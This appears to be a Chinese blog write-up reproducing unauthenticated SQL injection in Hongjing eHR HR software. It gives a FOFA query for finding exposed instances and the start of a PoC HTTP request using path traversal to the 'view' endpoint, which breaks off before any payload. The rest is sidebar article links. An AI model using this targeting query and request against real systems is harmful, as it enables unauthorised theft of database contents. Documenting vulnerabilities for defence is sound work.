宏景eHR 多处 SQL注入漏洞复现

0x01 产品简介

宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。

0x02 漏洞概述

宏景eHR view、trainplan_tree.jsp等接口处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。

0x03 复现环境

FOFA:app="HJSOFT-HCM"

0x04 漏洞复现

PoC-1

POST /templates/attestation/../../general/info/view HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-01-13 16:40:01       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-01-13 16:40:01       101 阅读
  3. 在Django里面运行非项目文件

    2024-01-13 16:40:01       82 阅读
  4. Python语言-面向对象

    2024-01-13 16:40:01       91 阅读

热门阅读

  1. css height:单位 % 高度 跟vh高度区别

    2024-01-13 16:40:01       56 阅读
  2. PHP AES加密:保护数据安全的高级加密技术

    2024-01-13 16:40:01       70 阅读
  3. 网络安全事件分级指南

    2024-01-13 16:40:01       50 阅读
  4. 第二百六十一回

    2024-01-13 16:40:01       71 阅读
  5. 一系列实用工具、编程工具和学习网站推荐

    2024-01-13 16:40:01       55 阅读
  6. CNN和RNN的区别是什么?

    2024-01-13 16:40:01       55 阅读
  7. vue2使用富文本wangeditor

    2024-01-13 16:40:01       61 阅读